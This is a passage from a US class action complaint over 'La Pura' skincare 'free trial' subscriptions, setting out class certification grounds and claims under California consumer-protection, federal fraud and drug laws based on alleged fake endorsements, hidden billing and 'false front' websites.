363.   <u>SUPERIORITY</u>: A class action is superior to other available methods for the fair and efficient adjudication of the present controversy, in that it will permit a large number of claims to be resolved in a single forum simultaneously, efficiently, and without the unnecessary hardship that would result from the prosecution of numerous individual actions and the duplication of discovery, effort, expense and burden on the courts that individual actions would engender. The benefits of proceeding as a class action, including providing a method for obtaining redress for claims that would not be practical to pursue individually, are far superior than any difficulties that might be argued with regard to the management of this class action. This superiority makes class litigation superior to any other method available for the fair and efficient adjudication of these claims. Absent a class action, it would be highly unlikely that the representative Plaintiff or any other members of the Class would be able to protect their own interests because the cost of litigation through individual lawsuits might exceed expected recovery.

364.   Certification of this class action is appropriate because the questions of law or fact common to the respective members of the Class predominate over questions of law or fact affecting only individual members. Certification also is appropriate because Defendants acted, or refused to act, on grounds generally applicable to the Class, thereby making appropriate the relief sought on behalf of the Class as a whole. Further, given the large number of potentially injured consumers, allowing individual actions to proceed in lieu of a class action would run the risk of yielding inconsistent and conflicting adjudications. Certification of Plaintiff's claims for class-wide treatment is also appropriate because Plaintiff can prove the elements of the claims on a class-wide basis using the same evidence as would be used to prove those elements in individual actions alleging the same claims.

365.   Notice to the members of the Class may be accomplished inexpensively, efficiently, and in a manner best designed to protect the rights of all Class members. Class notice can likely be directly sent to individual members of the Class because Defendants'

own records and documents will likely identify all members of the Class and contain their contact information.

## CAUSES OF ACTION

### FIRST CAUSE OF ACTION

### Violation of the Consumer Legal Remedies Act

### Cal. Civ. Code § 1750, *et seq.*

366.    Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

367.    Plaintiff brings this claim individually and on behalf of the Class.

368.    The Consumer Legal Remedies Act ("CLRA") prohibits deceptive practices in connection with the conduct of a business that provides goods, property, or services primarily for personal, family, or household purposes.

369.    Defendants' false and misleading labeling and other policies, acts, and practices were designed to, and did, induce the purchase and use of Defendants' Product for personal, family, or household purposes by Plaintiff and Class Members, and violated and continue to violate the following sections of the CLRA:

   a. § 1770(a)(2): misrepresenting the source, sponsorship, approval, or certification of goods or services, in particular through the false celebrity endorsements, magazine appearances, affiliations with Amazon, and false presentation of websites as news articles described herein;

   b. § 1770(a)(3): misrepresenting the affiliation, connection, or association with, or certification by, another, in particular through the false celebrity endorsements, magazine appearances, affiliations with Amazon, and false presentation of websites as news articles described herein;

   c. § 1770(a)(5): representing that goods have sponsorship, approval, characteristics, ingredients, uses, benefits, or quantities that they do not

have, in particular through the false celebrity endorsements, magazine appearances, affiliations with Amazon, the "false front" websites, the representations regarding limited supply, and the false presentation of websites as news articles described herein;

d. § 1770(a)(7): representing that goods are of a particular standard, quality, or grade if they are of another, in particular the false celebrity endorsements, magazine appearances, and affiliations with Amazon as described herein;

e. § 1770(a)(9): advertising goods with intent not to sell them as advertised, in particular in representing that they would be sold for the cost of shipping and handling as part of a free trial or for free or "$0.00" when the Defendants in fact intended to sell them as part of an ongoing subscription;

f. § 1770(a)(13): making false or misleading statements of fact concerning reasons for, existence of, or amounts of, price reductions, in particular the false representations of a "free trial," the false representations that the products would be free or cost $0.00, and the false representations regarding limited supply as described herein;

370. Defendants profited from their sales of the falsely, deceptively, and unlawfully advertised Product to unwary consumers.

371. Plaintiff and members of the Class purchased the Products for personal use, in reliance on Defendants' false and misleading material claims as described herein.

372. Pursuant to Cal. Civ. Code § 1780(d), Plaintiff has attached its affidavit of venue hereto as Exhibit 3.

373. As a result of Defendants' violations of the CLRA, Plaintiff and the Class have suffered irreparable harm and seek injunctive relief prohibiting further violations of the CLRA. Plaintiff and the Class also seek to recover their attorneys' fees and costs.

374.   Ms. Tan has standing to seek injunctive relief because she may be injured by the Defendants' conduct in the future. Defendants appear to be cycling through product names and product types, and on information and belief, have been running other "free trial" scams. Defendants may present other offers that result in fraudulent billing and which would be difficult to detect or identify as coming from them. Defendants also have Ms. Tan's personal information and could try to use her personal information for nefarious purposes without her consent, just as they did in the past.

375.   Under Cal. Civ. Code § 1782(d), a plaintiff may without prior notification file a complaint alleging violations of the CLRA that seeks injunctive relief only. If the plaintiff later sends a CLRA notification letter and the defendant does not remedy the CLRA violations within 30 days of notification, the plaintiff may amend its CLRA causes of action without leave of court to add claims for damages.

376.   Pursuant to §1782 of the CLRA and concurrently with the filing/service of this complaint, Plaintiff will notify Defendants in writing of the particular violations of §1770 of the CLRA and demand Defendants rectify the actions described above by providing complete monetary relief, agreeing to be bound by their legal obligations and to give notice to all affected customers of their intent to do so.

377.   If Defendants fail to adequately respond to Plaintiff's demand within 30 days of the letter pursuant to §1782 of the CLRA, Plaintiff will then amend this claim to add additional claims for relief, including claims for compensatory and punitive damages.

## SECOND CAUSE OF ACTION

### Violation of the California False Advertising Law

### Cal. Bus. & Prof. Code §§ 17500, *et seq.*

378.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

379.   Plaintiff brings this claim individually and on behalf of the Class.

380.   Pursuant to California Business and Professions Code § 17500, *et seq.*, it is unlawful to engage in advertising "which is untrue or misleading, and which is known, or

which by the exercise of reasonable care should be known, to be untrue or misleading . . . [or] to so make or disseminate or cause to be so made or disseminated any such statement as part of a plan or scheme with the intent not to sell that personal property or those services, professional or otherwise, so advertised at the price stated therein, or as so advertised."

381.   Defendants have violated § 17500, *et seq.*, in particular as described herein through the false celebrity endorsements, magazine appearances, affiliations with Amazon, the omissions regarding their "false front" websites, their presentation of the "false front" websites to banks and credit card companies, the representations regarding limited supply, their efforts to make it difficult to cancel subscriptions, the "free trial" representations, the false representation that the products would cost $0.00, and the false presentation of websites as news articles described herein.

382.   Pursuant to California Business and Professions Code § 17505, "No person shall state, in an advertisement of his goods, that he is a producer, manufacturer, processor, wholesaler, or importer, or that he owns or controls a factory or other source of supply of goods, when such is not the fact, and no person shall in any other manner misrepresent the character, extent, volume, or type of his business."

383.   Defendants have violated § 17505, in particular through their representations of limited supply, the "false front" website, the false celebrity endorsements, and the false presentation of websites as news articles described herein.

384.   Defendants misled consumers by making misrepresentations and untrue statements about their products as described herein.

385.   Defendants misled consumers by omitting material information which they were under a duty to disclose as described herein. Defendants were under a duty to disclose this material information to Plaintiff and the Class Members.

386.   Defendants knew, or by the exercise of reasonable care should have known, that their representations and omissions were untrue and misleading, and deliberately made the aforementioned representations and omissions in order to deceive reasonable

consumers like Plaintiff and other Class Members. In particular and *inter alia*, this is evidenced by the numerous negative reviews online regarding these products and others which were specifically directed at the Defendants or their companies by name, by customer complaints which, on information and belief, were communicated directly to the Defendants by victims, by the outlandishness of the conduct described and of the stories the Defendants concocted regarding Oprah, Ellen DeGeneres, Shark Tank, and others, the significant publicity these illegal free trial schemes have received, prior FTC actions and criminal prosecutions against similar enterprises, and the fact that the prevalence and illegality of these activities is well known in the affiliate marketing and direct marketing industries.

387.   As a direct and proximate result of Defendants' misleading and false advertising, Plaintiff and the other Class Members have suffered injury in fact and have lost money or property, time, and attention. Plaintiff reasonably relied upon Defendants' representations regarding their products. In reasonable reliance on Defendants' false representations, Plaintiff and other Class Members purchased the products at issue and paid more for those products than they would have had they been aware that Defendants' representations were false. Plaintiff and other Class Members ended up with Products that were overpriced, inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore Plaintiff and other Class Members have suffered injury in fact.

388.   Defendants' representations were material to the decision of Plaintiffs and the Class Members to purchase Defendants' products, and a reasonable person would have attached importance to the truth or falsity of the representations made by the Defendants in determining whether to purchase the Defendants' products. The suggestion that the products were endorsed by celebrities and magazines was a factor in Ms. Tan's purchase and tended to lend credibility to the product, and a reasonable consumer who knew this was false would not have signed up for the "free trial." With respect to the omissions by Defendants as described herein, those omissions were material and Plaintiff and the Class

Members would have behaved differently if the information had been disclosed. Had Defendants disclosed the omitted information, that there would be an ongoing subscription and not a one-time free sample with only a shipping and handling charge, that there was not a limited supply, and that Defendants intended to use the "false front" websites to defraud the consumers' banks and credit card companies if they attempted a chargeback, Plaintiff and the Class Members would have been aware of it and would not have purchased the products from Defendants or would not have paid the same price for those products.

389.   Defendants advertised to Plaintiff and other Class Members, through written representations and omissions made by Defendants and their employees that the La Pura Products would be of a particular nature and quality.

390.   The misleading and false advertising described herein presents a continuing threat to Plaintiff and the Class Members in that Defendants persist and continue to engage in these practices, and will not cease doing so unless and until forced to do so by this Court. Defendants' conduct will continue to cause irreparable injury to consumers unless enjoined or restrained. Plaintiff is entitled to injunctive relief ordering Defendants to cease their false advertising, and Plaintiff and all Class Members are entitled to restitution of the entirety of the Defendants' revenues associated with their false advertising, or such portion of those revenues as the Court may find equitable.

### THIRD CAUSE OF ACTION
### Violation of the Unfair and Fraudulent Prongs
### of the California Unfair Competition Law
### Cal. Bus. & Prof. Code §§ 17200, *et seq.*

391.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

392.   Plaintiff brings this claim individually and on behalf of the Class under the "unfair" and "fraudulent" prongs of California's Unfair Competition Law, Business and Professions Code section 17200, *et seq.*, on behalf of themselves and the Classes against Defendants.

393.   As alleged herein, Plaintiff has suffered injury in fact and lost money or property as a result of Defendants' conduct because among other things Ms. Tan was auto-billed without her permission and was charged on her credit card without permission. Plaintiff suffered that injury at the time of purchase when Plaintiff bought products that do not deliver the benefits Defendants promise, as well as on the dates her credit card was billed without permission.

394.   The Unfair Competition Law, Business & Professions Code §17200, *et seq.* ("UCL") prohibits "unfair competition," which includes "any unlawful, unfair or fraudulent business act or practice and unfair, deceptive, untrue or misleading advertising and any act prohibited by Chapter 1 (commencing with Section 17500) of Part 3 of Division 7 of the Business and Professions Code."

395.   Defendants committed "unfair" business acts or practices by, among other things: (1) engaging in conduct where the utility of such conduct, if any, is outweighed by the gravity of the consequences to Plaintiffs and members of the Classes; (2) engaging in conduct that is immoral, unethical, oppressive, unscrupulous, or substantially injurious to Plaintiffs and members of the Classes; and (3) engaging in conduct that undermines or violates the spirit or intent of the consumer protection laws alleged in this Class Action Complaint.

396.   The utility of the conduct committed by Defendants and as described herein is nonexistent. There is no utility to falsely suggesting to customers that a product has been endorsed by celebrities, to falsely suggesting a customer is signing up for a free trial, to running a "false front" website to deceive banks and others, to operating a "load balancer," or to any of the other conduct by Defendants. The harm to consumers caused by this conduct, by contrast, is significant. Defendants' conduct described herein not only deprived the consumers of the value they were expecting to receive, it also caused them to treat themselves with ineffective products rather than alternative options, deprived them of money, and interfered with their lawful efforts to convince their banks that a fraudulent transaction had occurred.

397.   Defendants' conduct as described in this Complaint offends established public policies. Defendants' conduct violated numerous civil and criminal statutes, as described further herein and in detail in the Fourth Cause of Action. Those statutes exist for a reason: to protect consumers from unfair marketing practices, and in many cases to protect consumers' health. It is a particularly important public policy issue to avoid these kinds of violations in products that relate to health care or that are applied to the human body given the risks of such violations.

398.   Defendants' conduct as described in this Complaint is immoral, unethical, oppressive, and unscrupulous, as well as substantially injurious to Plaintiff and the Class. In particular and *inter alia*, this is evidenced by the outlandishness of the conduct described and of the story Defendants concocted regarding Oprah, Ellen  DeGeneres, Shark Tank, and other celebrities, the significant publicity these illegal free trial schemes have received, prior FTC actions against similar criminal enterprises, and the fact that the illegality of these activities is well known in the affiliate marketing and direct marketing industries, and by the widespread dishonesty present in Defendants' marketing materials.

399.   Defendants' conduct as described in this Complaint violates the letter, spirit, and intent of the consumer protection laws. Their products are marketed dishonestly and in violation of various consumer protection laws, as described herein and in the Causes of Action of this complaint.

400.   As detailed herein, Defendants' unfair and/or fraudulent practices include disseminating false and/or misleading representations, through their marketing and advertising.

401.   Defendants are aware that the claims or omissions they have made about the Products were and continue to be false and misleading.

402.   Defendants had an improper motive—profit before accurate marketing—in their practices related to their deceptive practices, as set forth herein.

403.   There were reasonably available alternatives to further Defendants' legitimate business interests other than the conduct described herein. For example, Defendants could

have removed the false and misleading representations from their advertisements, provided omitted information to Plaintiff and the other Class Members to avoid any deception, and could have complied with the law rather than violating the statutes as described in Plaintiff's Fourth Cause of Action.

404.   As a direct and proximate result of Defendants' unfair or fraudulent business acts and practices and misleading and false advertising, Plaintiff and the other Class Members have suffered injury in fact and have lost money or property, time, and attention. Plaintiff reasonably relied upon Defendants' representations regarding their products. In reasonable reliance on Defendants' false representations, Plaintiff and other Class Members purchased the products at issue and paid more for those products than they would have had they been aware that Defendants' representations were false. Plaintiff and other Class Members ended up with Products that were overpriced,  inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore Plaintiff and other Class Members have suffered injury in fact.

405.   Defendant's representations were material to the decision of Plaintiffs and the Class Members to purchase Defendant's products, and a reasonable person would have attached importance to the truth or falsity of the representations made by Defendant in determining whether to purchase Defendant's products, as described in detail herein. With respect to the omissions by Defendant as described herein, those omissions were material and Plaintiff and the Class Members would have behaved differently if the information had been disclosed. Had Defendants disclosed the omitted information, Plaintiff and the Class Members would have been aware of it and would not have purchased the products from Defendant or would not have paid the same price for those products. Similarly, had Defendants not engaged in the unfair and fraudulent business acts or practices described in this Complaint, Plaintiff and the Class Members would not have purchased the products from Defendant or would not have paid the same price for those products.

406.   As purchasers and consumers of Defendants' Products, and as members of the general public who purchased and used the Products and have suffered injury in fact and

lost money and property as a result of this unfair competition and unlawful conduct, Plaintiff and the Class are entitled to and bring this class action seeking all available remedies under the UCL.

407.   The unfair and unlawful competitive practices described herein presents a continuing threat to Plaintiff and the Class Members in that Defendants persist and continue to engage in these practices, and will not cease doing so unless and until forced to do so by this Court. Defendants' conduct will continue to cause irreparable injury to consumers unless enjoined or restrained. Under Business & Professions Code **§** 17203, Plaintiff is entitled to injunctive relief ordering Defendants to cease their unfair competitive practices, and Plaintiff and all Class Members are entitled to restitution of the entirety of the Defendants' revenues associated with their unlawful acts and practices, or such portion of those revenues as the Court may find equitable.

## FOURTH CAUSE OF ACTION

### Violation of the Unlawful Prong
### of the California Unfair Competition Law
### Cal. Bus. & Prof. Code §§ 17200, *et seq.*

408.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

409.   Plaintiff brings this claim under the "unlawful" prong of California's Unfair Competition Law, Business and Professions Code section 17200, *et seq.*, individually and on behalf of the Class against the Defendants.

410.   The Unfair Competition Law, Business & Professions Code §17200, *et seq.* ("UCL") prohibits "unfair competition," which includes "any unlawful, unfair or fraudulent business act or practice and unfair, deceptive, untrue or misleading advertising and any act prohibited by Chapter 1 (commencing with Section 17500) of Part 3 of Division 7 of the Business and Professions Code."

411.   As detailed in Plaintiff's First Cause of Action, Defendants' acts and practices are unlawful because they violate the California Consumer Legal Remedies Act, Cal. Civ. Code § 1750, *et seq.*

412.   As detailed in Plaintiff's Second Cause of Action, the Defendants' acts and practices are unlawful because they violate the California False Advertising Law, Business & Professions Code §§ 17500, et seq.

413.   As detailed in Plaintiff's Third Cause of Action, the Defendants' acts and practices are unlawful because they violate the prongs of California's Unfair Competition Law,  Cal. Bus. & Prof. Code §§ 17200, *et seq.*, which prohibit any "unfair or fraudulent business act or practice and unfair, deceptive, untrue or misleading advertising...."

414.   As detailed in Plaintiff's Sixth Cause of Action, the Defendants' acts and practices are unlawful because they violate the California Automatic Renewal Law,  Cal. Bus. & Prof. Code §§ 17600, *et seq*.

415.   As detailed in Plaintiff's Sixth Cause of Action, the Defendants' acts and practices are unlawful because they violate the Electronic Funds Transfer Act,  15 U.S.C. § 1693e.

## Bank Fraud
## In Violation Of 18 U.S. Code § 1344

416.   The Defendants' conduct here is unlawful because they have committed bank fraud and conspired to commit multiple counts of bank fraud in violation of 18 U.S. Code § 1344.

417.   Pursuant to 18 U.S. Code § 1344, "[w]hoever knowingly executes, or attempts to execute, a scheme or artifice (1) to defraud a financial institution; or (2) to obtain any of the moneys, funds, credits, assets, securities, or other property owned by, or under the custody or control of, a financial institution, by means of false or fraudulent pretenses, representations, or promises" is in violation of the statute.

418.   Pursuant to 18 U.S. Code § 1349, "[a]ny person who attempts or conspires to commit any offense under this chapter shall be subject to the same penalties as those

prescribed for the offense, the commission of which was the object of the attempt or conspiracy."

419.   The Defendants here conspired to commit bank fraud and to receive money obtained from bank fraud in violation of federal law.

420.   The money obtained by the Defendants through the try-la-pura-skincare.com/lm/ and try-la-pura-skincare.com/l3/ websites was obtained through credit cards or debit cards and was thus under the custody or control of financial institutions (in the case of Ms. Tan, San Diego County Credit Union). That money was obtained fraudulently. As described in this complaint, Defendants intentionally used fake news stories and fake endorsements from celebrities, with the intent that Plaintiff and other Class Members rely upon them, in order to obtain their credit card numbers for the purpose of fraudulently billing them for subscriptions to which they did not agree. Defendants intentionally created a "false front" website for the purpose of defrauding banks and credit card companies into believing that customers consented to these subscriptions, when in fact the customers were told that they would pay $0.00 for the La Pura Products.

421.   Moreover, Defendants further "churned" the merchant accounts of various shell companies to deceive banking institutions and prevent them from identifying the billings as fraudulent, which would have enabled the banks to prevent Defendants from continuing to charge their customers. Specifically, Defendants utilized the specialized software developed by the Konnektive Defendants, which provided them with automated "load balancing." This enabled Defendants to charge their victims' credit cards and debit cards using merchant accounts that were not detected by the fraud detection systems.

422.   Defendants knowingly conspired together to commit these violations and to benefit financially from this illegal scheme.

423.   Defendants' actions with respect to the products as described above are in violation of 18 U.S.C. § 1344 and thus constitute unlawful business acts or practices under the UCL.

**Wire Fraud**

**In Violation Of 18 U.S. Code § 1343**

424.   Defendants' conduct here is unlawful because they have committed wire fraud and conspired to commit multiple counts of wire fraud in violation of 18 U.S. Code § 1343.

425.   Pursuant to 18 U.S. Code § 1343, "[w]hoever, having devised or intending to devise any scheme or artifice to defraud, or for obtaining money or property by means of false or fraudulent pretenses, representations, or promises, transmits or causes to be transmitted by means of wire, radio, or television communication in interstate or foreign commerce, any writings, signs, signals, pictures, or sounds for the purpose of executing such scheme or artifice" is in violation of the statute.

426.   Pursuant to 18 U.S. Code § 1349, "[a]ny person who attempts or conspires to commit any offense under this chapter shall be subject to the same penalties as those prescribed for the offense, the commission of which was the object of the attempt or conspiracy."

427.   The Defendants here conspired to commit wire fraud and to receive money obtained from wire fraud in violation of federal law.

428.   The Defendants transmitted written communications by means of wire as part of their scheme to defraud, in particular through text messages, Internet ads, their websites, through e-mail, through telephone communications to consumers which were intended to prevent them from exercising their lawful right to a chargeback, and through telephone or Internet communications to banks and credit card companies asserting that their subscription billings had been agreed to by customers or that their "false front" websites were the site consumers visited. Those transmissions crossed state lines, at least from Colorado to California to Georgia and other states.

429.   The money obtained by the Defendants through the try-la-pura-skincare.com/lm/ and try-la-pura-skincare/l3/ landing pages was obtained fraudulently. As described in this complaint, the Defendants intentionally used fake news stories and fake endorsements from celebrities, with the intent that Plaintiff and the other Class Members rely upon them, in order to obtain their credit card numbers for the purpose of fraudulently

billing them for subscriptions they did not agree to. Defendants intentionally created a "false front" website for the purpose of defrauding banks and credit card companies into believing that customers consented to these subscriptions, when in fact the customers were not even informed of them. Defendants knowingly conspired together to commit these violations and to benefit financially from this illegal scheme.

430.   Defendants' actions with respect to its products as described above are in violation of 18 U.S. Code § 1343 and thus constitute unlawful business acts or practices under the UCL.

## Mail Fraud

## In Violation Of 18 U.S. Code § 1341

431.   Defendants' conduct here is unlawful because they have committed mail fraud and conspired to commit multiple counts of mail fraud in violation of 18 U.S. Code § 1341.

432.   Pursuant to 18 U.S. Code § 1341, "[w]hoever, having devised or intending to devise any scheme or artifice to defraud, or for obtaining money or property by means of false or fraudulent pretenses, representations, or promises, or to sell, dispose of, loan, exchange, alter, give away, distribute, supply, or furnish or procure for unlawful use any counterfeit or spurious coin, obligation, security, or other article, or anything represented to be or intimated or held out to be such counterfeit or spurious article, for the purpose of executing such scheme or artifice or attempting so to do, places in any post office or authorized depository for mail matter, any matter or thing whatever to be sent or delivered by the Postal Service, or deposits or causes to be deposited any matter or thing whatever to be sent or delivered by any private or commercial interstate carrier, or takes or receives therefrom, any such matter or thing, or knowingly causes to be delivered by mail or such carrier according to the direction thereon, or at the place at which it is directed to be delivered by the person to whom it is addressed, any such matter or thing" is in violation of the statute.

433.   Pursuant to 18 U.S. Code § 1349, "[a]ny person who attempts or conspires to commit any offense under this chapter shall be subject to the same penalties as those

prescribed for the offense, the commission of which was the object of the attempt or conspiracy."

434.   The Defendants here conspired to commit mail fraud and to receive money obtained from mail fraud in violation of federal law.

435.   The Defendants transmitted matter or things and took or received matter or things via the Postal Service or private or commercial interstate carriers as part of their scheme to defraud, in particular by accepting return packages at the QuickBox address shipped across state lines from other states (including from the State of California), and by shipping products through the mail system to unwitting victims of the scheme with the intent to fraudulently bill them for those products that were not intentionally ordered by their victims

436.   The money obtained by the Defendants through the try-la-pura-skincare.com/lm/ and try-la-pura-skincare.com/l3 landing pages was obtained fraudulently. As described in this complaint, the Defendants intentionally used fake news stories and fake endorsements from celebrities, with the intent that Plaintiff and the Class rely upon them, in order to obtain their credit card numbers for the purpose of fraudulently billing them for subscriptions they did not agree to. The Defendants intentionally created "false front" websites for the purpose of defrauding banks and credit card companies into believing that customers consented to these subscriptions, when in fact the customers were not even informed of them. The Defendants knowingly conspired together to commit these violations and to benefit financially from this illegal scheme.

437.   Defendants' actions with respect to their products as described above are in violation of 18 U.S. Code § 1341 and thus constitute unlawful business acts or practices under the UCL.

**Unlawful Violations of Federal Trade Commission Regulations**
**Concerning Use of Endorsements and Testimonials in Advertising**
**16 C.F.R. pt. 255,** *et seq.*

438.   The Defendants' acts and practices are unlawful under the California UCL because they violate Federal regulations governing the use of endorsements and testimonials in advertising.

439.   Pursuant to 16 C.F.R. pt. 255.1(a), "an endorsement may not convey any express or implied representation that would be deceptive if made directly by the advertiser." Under 16 C.F.R. pt. 255(1)(c), "[a]dvertisers are subject to liability for false or unsubstantiated statements made through endorsements...."

440.   The term "endorsement" means "any advertising message (including verbal statements, demonstrations, or depictions of the name, signature, likeness or other identifying personal characteristics of an individual or the name or seal of an organization) that consumers are likely to believe reflects the opinions, beliefs, findings, or experiences of a party other than the sponsoring advertiser, even if the views expressed by that party are identical to those of the sponsoring advertiser." 16 C.F.R. pt. 255(b). "Endorsement" as used by the regulation means both endorsements and testimonials. *Id.* at 255(c).

441.   Endorsers include consumers who receive free products from advertisers through their marketing programs. 16 C.F.R. pt. 255, Example 8. Endorsers also include third party bloggers who are compensated in any way by advertisers, and advertisers are subject to liability for misleading or unsubstantiated representations made by paid endorsers on their websites. 16 C.F.R. pt. 255.1, Example 5.

442.   Under the regulations, advertisers have a duty to train endorsers and to monitor their statements, and to take necessary steps to halt continued publication of deceptive representations by endorsers: "In order to limit its potential liability, the advertiser should ensure that the advertising service provides guidance and training to its bloggers concerning the need to ensure that statements they make are truthful and substantiated. The advertiser should also monitor bloggers who are being paid to promote its products and take steps necessary to halt the continued publication of deceptive representations when they are discovered." 16 C.F.R. pt. 255.1, Example 5.

443.   Plaintiff incorporates by reference the Factual Allegations section of this Complaint.

444.   As that section describes, the Defendants faked various endorsements from celebrities and other third parties who in fact have no connection to the product, have not used it, and did not make the statements and endorsements the Defendants attributed to them.

445.   Under 16 C.F.R. pt. 255.2(c), "[a]dvertisements presenting endorsements by what are represented, directly or by implication, to be "actual consumers" should utilize actual consumers in both the audio and video, or clearly and conspicuously disclose that the persons in such advertisements are not actual consumers of the advertised product."

446.   The Defendants falsely presented endorsements from celebrities as if those celebrities were actual consumers, including photographs of those purported celebrity consumers.

447.   Members of the Class were injured by this unlawful conduct and the violations of these regulations, in that Ms. Tan and the other class members would not have purchased the products but for the fake endorsements from celebrities and third parties which made the product seem credible.

448.   Defendants' actions with respect to its endorsers as described above are in violation of 16 C.F.R. pt. 255, *et seq.* and thus constitute unlawful business acts or practices under the UCL.

<div align="center">

**Unlawful Violations of the**

**Sherman Food, Drug, & Cosmetic Law**

**Cal. Health & Safety Code, §§ 109875, *et seq.***

</div>

449.   Defendants' acts and practices are unlawful under the California UCL because they violate the Sherman Food, Drug, & Cosmetic Law.

450.   Defendants' products constitute cosmetics under the Sherman Food, Drug, & Cosmetic Law. Pursuant to Cal. Health & Safety Code § 109900, a "cosmetic" is "any article, or its components, intended to be rubbed, poured, sprinkled, or sprayed on,

introduced into, or otherwise applied to, the human body, or any part of the human body, for cleansing, beautifying, promoting attractiveness, or altering the appearance." Defendants' products are cosmetics under this definition because they are applied to the human body in some form, and the products product sold by them are designed to beautify, promote the attractiveness of, or alter the appearance of skin.

451. Defendants' products also constitute drugs under the Sherman Food, Drug, & Cosmetic Law. Pursuant to Cal. Health & Safety Code § 109925, a "drug" includes "[a]n article used or intended for use in the diagnosis, cure, mitigation, treatment, or prevention of disease in human beings or any other animal" and "[a]n article other than food, that is used or intended to affect the structure or any function of the body of human beings or any other animal." The Defendants' products are drugs under this definition because they are not food and because they are intended to affect the structure or function of the skin and its cells, and claim to affect such structure or function.

452. Defendants' products also constitute new drugs under the Sherman Food, Drug, & Cosmetic Law. Pursuant to Cal. Health & Safety Code § 109980, a "new drug" includes "[a]ny drug the composition of which is such that the drug is not generally recognized, among experts qualified by scientific training and experience to evaluate the safety and effectiveness of drugs, as safe and effective for use under the conditions prescribed, recommended, or suggested in the labeling or advertising thereof," or one that "has become so recognized, but that has not, otherwise than in the investigations, been used to a material extent or for a material time under the conditions." The Defendants' products are not generally recognized among experts as being safe and effective for the conditions they are advertised to treat.

453. Defendants' representations as described in this Complaint constitute advertisements under the Sherman Food, Drug, & Cosmetic Law. Pursuant to Cal. Health & Safety Code § 109885, an "advertisement" means "any representations, including, but not limited to, statements upon the products, its packages, cartons, and any other container, disseminated in any manner or by any means, for the purpose of inducing, or that is likely

to induce, directly or indirectly, the purchase or use of any food, drug, device, or cosmetic." The representations as described herein were likely to induce, directly or indirectly, the purchase of the Defendants' products, which constitute drugs and cosmetics, and they did in fact induce such purchases as described in this Complaint. The representations were disseminated to the Plaintiffs and the Class using various means, including fake text messages, online advertisements,  and on the Defendants' websites.

454.   Pursuant to Cal. Health & Safety Code § 110390, "[i]t is unlawful for any person to disseminate any false advertisement of any food, drug, device, or cosmetic. An advertisement is false if it is false or misleading in any particular."

455.   Pursuant to Cal. Health & Safety Code § 110395, "[i]t is unlawful for any person to manufacture, sell, deliver, hold, or offer for sale any food, drug, device, or cosmetic that is falsely advertised."

456.   Defendants violated Cal. Health & Safety Code § 110390 and § 110395 by disseminating false and misleading advertisements, as described in detail throughout this Complaint, and by selling, delivering, and offering for sale their products which were falsely advertised.

457.   As stated above, Defendants' products are new drugs under the Sherman Food, Drug, & Cosmetic Law. *See* Cal. Health & Safety Code § 109980. New drugs are subject to specific approval requirements, and "[n]o person shall sell, deliver, or give away any new drug" unless the statutory requirements are satisfied. Cal. Health & Safety Code § 111550. One way to satisfy the requirements is that the product is a "new drug, and a new drug application has been approved for it and that approval has not been withdrawn, terminated, or suspended under Section 505 of the federal act (21 U.S.C. Sec. 355)." Cal. Health & Safety Code § 111550(a)(1). Another is that "[t]he department has approved a new drug or device application for that new drug or new device and that approval has not been withdrawn, terminated, or suspended." Cal. Health & Safety Code § 111550(b). The remaining methods are inapplicable to the Defendants' products, and on information and

belief, Defendants have failed to satisfy the approval requirements for a new drug under the Sherman Food, Drug, & Cosmetic Law.

458.   In addition to the various forms of harm alleged throughout this complaint, which Plaintiff incorporates here by reference, this particular violation specifically harmed Plaintiff and the Class by depriving them of the important and valuable protections of this statutory scheme, by causing them to purchase products whose efficacy and safety had not been verified, and by causing them to purchase the products at issue and pay more for those products than they were worth in the absence of statutory compliance.

459.   Defendants' actions with respect to its products as described above are in violation of Cal. Health & Safety Code, §§ 109875, *et seq.* and thus constitute unlawful business acts or practices under the UCL.

<div align="center">

**Unlawful Violations of the**
**Federal Food, Drug, and Cosmetic Act**
**21 U.S.C. § 301,** ***et seq.***

</div>

460.   Defendants' acts and practices are unlawful under the California UCL because they violate the Federal Food, Drug, and Cosmetic Act.

461.   Defendants' products constitute drugs under the Federal Food, Drug, and Cosmetic Act. Pursuant to 21 U.S.C. § 321(g)(1), a "drug" includes "(C) articles (other than food) intended to affect the structure or any function of the body of man or other animals...."

462.   Defendants' products are advertised as affecting the structure or function of the human body, and are intended to affect the structure or function of the human body. Defendants advertise that their products are "the new injection-free solution."[147] They claim their "clinically proven ingredient matrix delivers whole collagen molecules to nourish the dermal matrix on the inside, and reduce signs of aging on the outside." They also advertise that La Pura alters the functionality of the human skin, claiming: "The

---

[147] https://www.try-la-pura-skincare.com/l3/

peptide-rich wrinkle serum is applied to the skin, rebuilding and rejuvenating the skin"; "the boost in collagen and elastin helps retain the skin's dermal structure which results in reduction of the look of fine lines"; "active ingredients facilitate in trapping moisture, which in turn hydrates the skin and prevents cracking"; and "boosts skin immunity and prevents damaging of free radicals."

463.   Defendants' products constitute new drugs under the Federal Food, Drug, and Cosmetic Act. Pursuant to 21 U.S.C. § 321(p)(1), a "new drug" includes "[a]ny drug (except a new animal drug or an animal feed bearing or containing a new animal drug) the composition of which is such that such drug is not generally recognized, among experts qualified by scientific training and experience to evaluate the safety and effectiveness of drugs, as safe and effective for use under the conditions prescribed, recommended, or suggested in the labeling thereof, except that such a drug not so recognized shall not be deemed to be a "new drug" if at any time prior to June 25, 1938, it was subject to the Food and Drugs Act of June 30, 1906, as amended, and if at such time its labeling contained the same representations concerning the conditions of its use...."

464.   Defendants' products are not generally recognized among experts as being safe and effective for the conditions they are advertised to treat.

465.   Pursuant to 21 U.S.C. § 355(a), "No person shall introduce or deliver for introduction into interstate commerce any new drug, unless an approval of an application filed pursuant to subsection (b) or (j) is effective with respect to such drug."

466.   On information and belief, Defendants have not filed a new drug application or obtained approval of any of their products from the Food and Drug Administration. As such, it was unlawful for them to introduce or deliver their products into interstate commerce, and **all** sales or deliveries of their products in the United States were unlawful.

467.   In addition to the various forms of harm alleged throughout this complaint, which Plaintiff incorporates here by reference, this particular violation specifically harmed Plaintiff and the Class by depriving them of the important and valuable protections of this statutory scheme, by causing them to purchase products whose efficacy and safety had not

been verified, and by causing them to purchase the products at issue and pay more for those products than they were worth in the absence of statutory compliance.

